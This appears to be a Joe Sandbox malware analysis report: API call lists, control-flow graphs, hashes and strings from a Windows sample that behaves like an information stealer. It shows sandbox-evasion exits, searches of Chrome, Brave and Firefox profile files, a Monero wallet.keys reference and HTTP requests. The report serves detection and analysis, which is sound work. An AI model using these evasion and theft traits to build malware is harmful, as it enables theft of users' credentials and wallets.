                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 618e19bf7e9e723f91b02106640c1c32e1ceb6fbaa234ab2b19ddeb68720d2e4
                                    • Instruction ID: f865cf7d0a4b747b7d336bcd907ab17cbe1206231b7826a7b602f78685f0fdf4
                                    • Opcode Fuzzy Hash: 618e19bf7e9e723f91b02106640c1c32e1ceb6fbaa234ab2b19ddeb68720d2e4
                                    • Instruction Fuzzy Hash: C14183B1D04248EBDB10DF95DC45BDEBBB8EF48705F100199F90967290EB78AB48CBA5

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0588), ref: 009598A1
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0738), ref: 009598BA
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0750), ref: 009598D2
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07B0), ref: 009598EA
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0768), ref: 00959903
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E8840), ref: 0095991B
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015D6400), ref: 00959933
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015D6480), ref: 0095994C
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07C8), ref: 00959964
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07E0), ref: 0095997C
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07F8), ref: 00959995
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0558), ref: 009599AD
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015D6460), ref: 009599C5
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E05A0), ref: 009599DE
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 009411D0: ExitProcess.KERNEL32 ref: 00941211
                                      • Part of subcall function 00941160: GetSystemInfo.KERNEL32(?), ref: 0094116A
                                      • Part of subcall function 00941160: ExitProcess.KERNEL32 ref: 0094117E
                                      • Part of subcall function 00941110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0094112B
                                      • Part of subcall function 00941110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00941132
                                      • Part of subcall function 00941110: ExitProcess.KERNEL32 ref: 00941143
                                      • Part of subcall function 00941220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0094123E
                                      • Part of subcall function 00941220: ExitProcess.KERNEL32 ref: 00941294
                                      • Part of subcall function 00956770: GetUserDefaultLangID.KERNEL32 ref: 00956774
                                      • Part of subcall function 00941190: ExitProcess.KERNEL32 ref: 009411C6
                                      • Part of subcall function 00957850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009411B7), ref: 00957880
                                      • Part of subcall function 00957850: RtlAllocateHeap.NTDLL(00000000), ref: 00957887
                                      • Part of subcall function 00957850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0095789F
                                      • Part of subcall function 009578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957910
                                      • Part of subcall function 009578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00957917
                                      • Part of subcall function 009578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0095792F
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00956AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00956AF9
                                    • Sleep.KERNEL32(00001770), ref: 00956B04
                                    • CloseHandle.KERNEL32(?,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956B1A
                                    • ExitProcess.KERNEL32 ref: 00956B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 784b431ac98947fab930fcd5b56666cea63e9d7a3f0b446a28d3c2429f39c890
                                    • Instruction ID: 100719dc766fa5b2f3349e8f3a3c5561010f6c666258d39da6664babeac57b85
                                    • Opcode Fuzzy Hash: 784b431ac98947fab930fcd5b56666cea63e9d7a3f0b446a28d3c2429f39c890
                                    • Instruction Fuzzy Hash: 08314570904108ABDB04F7F1DC56FEE7778AF84342F404619FA12A3191EF745949C7AA

                                    Control-flow Graph

(Control-flow graph of the function at 00956AF3, blocks 00956ABA-00956B22; the rendered graph and its executed/not-executed legend are not reproduced here.)
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00956AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00956AF9
                                    • Sleep.KERNEL32(00001770), ref: 00956B04
                                    • CloseHandle.KERNEL32(?,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956B1A
                                    • ExitProcess.KERNEL32 ref: 00956B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: e6b934a49da9ee42d694f868e92f4757e40720c20dedcba420c4a70f545c0ff3
                                    • Instruction ID: 7d30ee9972da7c8c4d2b48ae44310cb1fc392f73f4ed810f77e2632f97b96dd6
                                    • Opcode Fuzzy Hash: e6b934a49da9ee42d694f868e92f4757e40720c20dedcba420c4a70f545c0ff3
                                    • Instruction Fuzzy Hash: 30F05E70944209ABF700EBA2DC1ABBD7B74EB44702F904915BD03A31E1DFB45948D766

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 4c67656f03ed8188d5a66f5d71fffa8d94fa3855b7a1832076bd371ee8f31916
                                    • Instruction ID: 37dbc37c4e4b75d7a71b56793ad2066dc3b7b86e00ca7b40e49c320d6f7c8ef4
                                    • Opcode Fuzzy Hash: 4c67656f03ed8188d5a66f5d71fffa8d94fa3855b7a1832076bd371ee8f31916
                                    • Instruction Fuzzy Hash: 46213BB1D00209ABDF14DFA5EC45BDE7B75FB44320F108625FA25A7291EB706A0ACB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 00946280: InternetOpenA.WININET(00960DFE,00000001,00000000,00000000,00000000), ref: 009462E1
                                      • Part of subcall function 00946280: StrCmpCA.SHLWAPI(?,015EE590), ref: 00946303
                                      • Part of subcall function 00946280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00946335
                                      • Part of subcall function 00946280: HttpOpenRequestA.WININET(00000000,GET,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00946385
                                      • Part of subcall function 00946280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009463BF
                                      • Part of subcall function 00946280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009463D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955228
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 51bf40492d3685b93ee5c65bac23114523c9120efb087d7fce48a96c3bae5f7d
                                    • Instruction ID: e8f7cf8e8ce82881293861c48b7f77897106fa9efb991504127657dbe1a9bdeb
                                    • Opcode Fuzzy Hash: 51bf40492d3685b93ee5c65bac23114523c9120efb087d7fce48a96c3bae5f7d
                                    • Instruction Fuzzy Hash: 5B112E30900008ABCB14FF61DD52FED7738AF90301F808658FD1A4A192EF34AB09C79A

                                    Control-flow Graph

control_flow_graph (basic blocks as id: address range, calls; edges as from->to)
• 1493: 941220-941247, call 9589b0, GlobalMemoryStatusEx
• 1496: 941273-94127a
• 1497: 941249-941271, call 95da00 * 2
• 1498: 941281-941285
• 1501: 941287
• 1502: 94129a-94129d
• 1504: 941292-941294, ExitProcess
• 1505: 941289-941290
• Edges: 1493->1496, 1493->1497, 1496->1498, 1497->1498, 1498->1501, 1498->1502, 1501->1504, 1501->1505, 1505->1502, 1505->1504
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0094123E
                                    • ExitProcess.KERNEL32 ref: 00941294
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 795b0981d067f2c96c01d2aa60a064a0dad2901b178631fc9ac8fe55dca338cc
                                    • Instruction ID: d9c993d1548475aa24b4937bbe4007f135bda869c925747dcb37309109b9864a
                                    • Opcode Fuzzy Hash: 795b0981d067f2c96c01d2aa60a064a0dad2901b178631fc9ac8fe55dca338cc
                                    • Instruction Fuzzy Hash: A40112B0D44308BBEB10DBD4CC49F9EB778AB54705F208155E715F61C0D7B45585CB99
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0094112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00941132
                                    • ExitProcess.KERNEL32 ref: 00941143
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: c882b516f88315ac8824b9934037e62b1b93237431e402e835f5a8a545bf93df
                                    • Instruction ID: 21524b71ef214b55ac1afac47deedec24d85fea7e6ed63d6ad9e19eff83adadb
                                    • Opcode Fuzzy Hash: c882b516f88315ac8824b9934037e62b1b93237431e402e835f5a8a545bf93df
                                    • Instruction Fuzzy Hash: 06E0E670945308FBF710ABA09C0AF097678AB04B41F104155F709771D0DAB52A40D7AA
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009410B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009410F7
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 9fc1f212256411a030567a6bf344448cdde74ccc7fb0e3879fc8a7405013281e
                                    • Instruction ID: d2d36b5abd75dd83efc0b6a01767ef20b1d4885bed8d4e749b8b641c85c0a650
                                    • Opcode Fuzzy Hash: 9fc1f212256411a030567a6bf344448cdde74ccc7fb0e3879fc8a7405013281e
                                    • Instruction Fuzzy Hash: 64F0E271641208BBE7149AA4AC59FABB7ECE705B15F300848F904E3290D9719E40DBA0
                                    APIs
                                      • Part of subcall function 009578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957910
                                      • Part of subcall function 009578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00957917
                                      • Part of subcall function 009578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0095792F
                                      • Part of subcall function 00957850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009411B7), ref: 00957880
                                      • Part of subcall function 00957850: RtlAllocateHeap.NTDLL(00000000), ref: 00957887
                                      • Part of subcall function 00957850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0095789F
                                    • ExitProcess.KERNEL32 ref: 009411C6
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 594b5ffc35a073ae6f552334d19d6341933e7dcc465e543937091abaab67fbec
                                    • Instruction ID: 2ab2c92ad2de74581fe8142f6d089feb4dc74104d29516629d6c35658f82e44b
                                    • Opcode Fuzzy Hash: 594b5ffc35a073ae6f552334d19d6341933e7dcc465e543937091abaab67fbec
                                    • Instruction Fuzzy Hash: 79E0ECB591420153DA00B3B2BC4AB2A369C5B54346F040425FE0593112FE29E944C76A
                                    APIs
                                    • wsprintfA.USER32 ref: 009538CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 009538E3
                                    • lstrcat.KERNEL32(?,?), ref: 00953935
                                    • StrCmpCA.SHLWAPI(?,00960F70), ref: 00953947
                                    • StrCmpCA.SHLWAPI(?,00960F74), ref: 0095395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00953C67
                                    • FindClose.KERNEL32(000000FF), ref: 00953C7C
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 42e32462862c579ca487b79fd4525059c240ab989e15e47a1c484716655f2ece
                                    • Instruction ID: fc607a8c36e72ff90d6c1011c638a33e0b1abb3acddf10f17f8ef378b880ff6f
                                    • Opcode Fuzzy Hash: 42e32462862c579ca487b79fd4525059c240ab989e15e47a1c484716655f2ece
                                    • Instruction Fuzzy Hash: 96A121B1A002189BDB24DF65DC85FEE737CBB88301F048589BA4D97151EB759B88CF62
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00960B32,00960B2B,00000000,?,?,?,009613F4,00960B2A), ref: 0094BEF5
                                    • StrCmpCA.SHLWAPI(?,009613F8), ref: 0094BF4D
                                    • StrCmpCA.SHLWAPI(?,009613FC), ref: 0094BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 0094C7D1
                                    Strings
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    APIs
                                    • wsprintfA.USER32 ref: 0095492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00954943
                                    • StrCmpCA.SHLWAPI(?,00960FDC), ref: 00954971
                                    • StrCmpCA.SHLWAPI(?,00960FE0), ref: 00954987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00954B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00954B92
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00954580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00954587
                                    • wsprintfA.USER32 ref: 009545A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 009545BD
                                    • StrCmpCA.SHLWAPI(?,00960FC4), ref: 009545EB
                                    • StrCmpCA.SHLWAPI(?,00960FC8), ref: 00954601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095468B
                                    • FindClose.KERNEL32(000000FF), ref: 009546A0
                                    • lstrcat.KERNEL32(?,015EE4B0), ref: 009546C5
                                    • lstrcat.KERNEL32(?,015ED358), ref: 009546D8
                                    • lstrlen.KERNEL32(?), ref: 009546E5
                                    • lstrlen.KERNEL32(?), ref: 009546F6
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    APIs
                                    • wsprintfA.USER32 ref: 00953EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00953EDA
                                    • StrCmpCA.SHLWAPI(?,00960FAC), ref: 00953F08
                                    • StrCmpCA.SHLWAPI(?,00960FB0), ref: 00953F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095406C
                                    • FindClose.KERNEL32(000000FF), ref: 00954081
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    APIs
                                    • wsprintfA.USER32 ref: 0094ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0094ED55
                                    • StrCmpCA.SHLWAPI(?,00961538), ref: 0094EDAB
                                    • StrCmpCA.SHLWAPI(?,0096153C), ref: 0094EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 0094F2C3
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009615B8,00960D96), ref: 0094F71E
                                    • StrCmpCA.SHLWAPI(?,009615BC), ref: 0094F76F
                                    • StrCmpCA.SHLWAPI(?,009615C0), ref: 0094F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0094FAC3
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0096510C,?,?,?,009651B4,?,?,00000000,?,00000000), ref: 00941923
                                    • StrCmpCA.SHLWAPI(?,0096525C), ref: 00941973
                                    • StrCmpCA.SHLWAPI(?,00965304), ref: 00941989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00941D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00941DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00941E20
                                    • FindClose.KERNEL32(000000FF), ref: 00941E32
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00960C2E), ref: 0094DE5E
                                    • StrCmpCA.SHLWAPI(?,009614C8), ref: 0094DEAE
                                    • StrCmpCA.SHLWAPI(?,009614CC), ref: 0094DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 0094E3F2
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009614B0,00960C2A), ref: 0094DAEB
                                    • StrCmpCA.SHLWAPI(?,009614B4), ref: 0094DB33
                                    • StrCmpCA.SHLWAPI(?,009614B8), ref: 0094DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 0094DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 74687fc993a11c46050a0863a01bd499288995caa78449e5b7f3e8e54796b2c1
                                    • Instruction ID: 0d3580489f3e05fc4de8f069461bc108402ca93c57401f73f2f4b35981aff965
                                    • Opcode Fuzzy Hash: 74687fc993a11c46050a0863a01bd499288995caa78449e5b7f3e8e54796b2c1
                                    • Instruction Fuzzy Hash: AD915F72900104ABDB14FB71EC96EED777CABC8301F408669BD0A96191FE349B4DCB96
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,009605AF), ref: 00957BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00957BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00957C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00957C62
                                    • LocalFree.KERNEL32(00000000), ref: 00957D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 2ef909328ed372b3ce6df17c97bd0ef64e5287508ba7fc0b38c5ad905914ebaa
                                    • Instruction ID: af02b4761572608845440011f722aacd642a0895e21f9021e48ad3ed641e7100
                                    • Opcode Fuzzy Hash: 2ef909328ed372b3ce6df17c97bd0ef64e5287508ba7fc0b38c5ad905914ebaa
                                    • Instruction Fuzzy Hash: 0D416071940118ABDB24DF95DC99BEEB778FF84701F2042D9E90962290DB342F89CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: x?$)7Om$.O{$56q$B-_]$aK$$bC6
                                    • API String ID: 0-3626200227
                                    • Opcode ID: e5a5f4263d87aa4d47923948e17f665903c359c4b486440f1af3cbfcf7f4a1a2
                                    • Instruction ID: 01637024605e6c499599a36403313f64770846c22f4a60e0ed3711f1176c2ffd
                                    • Opcode Fuzzy Hash: e5a5f4263d87aa4d47923948e17f665903c359c4b486440f1af3cbfcf7f4a1a2
                                    • Instruction Fuzzy Hash: 58B206F35086049FE3046F2DEC8567AFBEAEF94720F1A493DEAC483744EA3558058697
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00960D73), ref: 0094E4A2
                                    • StrCmpCA.SHLWAPI(?,009614F8), ref: 0094E4F2
                                    • StrCmpCA.SHLWAPI(?,009614FC), ref: 0094E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 3ed7bd24a9fb9aca9c592fc3d3feb1dc3de13b7de295e9f90259d9f0396e8eac
                                    • Instruction ID: 0c3fb15cc609d0e6cf4ae2baaa2ea016fb791da1fdbd62ae6be1014fcf9a6569
                                    • Opcode Fuzzy Hash: 3ed7bd24a9fb9aca9c592fc3d3feb1dc3de13b7de295e9f90259d9f0396e8eac
                                    • Instruction Fuzzy Hash: B31220719101189ADB18FB61DCA6FED7338BFD4301F4046A9B90A96091EF346F4DCB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *q36$5KYs$`H+$a}w${Nm~$)/}
                                    • API String ID: 0-3751471903
                                    • Opcode ID: d39dcef24c01c37899883d5f82dcb7f241c90607bde4e72bf3ae636a69f72b2f
                                    • Instruction ID: 404710ec8f9f25d53c42e05d530eba8152343d4e0e946712523704d923679270
                                    • Opcode Fuzzy Hash: d39dcef24c01c37899883d5f82dcb7f241c90607bde4e72bf3ae636a69f72b2f
                                    • Instruction Fuzzy Hash: 60B227F360C204AFE7046E2DEC85A7AFBE9EF94720F16493DE6C5C3744EA3558018696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (w[$(/>$BWw{$XEI_$eH8T$K|;
                                    • API String ID: 0-1985316531
                                    • Opcode ID: 62aa3e04ccdfc2408b56b9cce6a74a5ad29bf32e1c0408dcabf73c712725460c
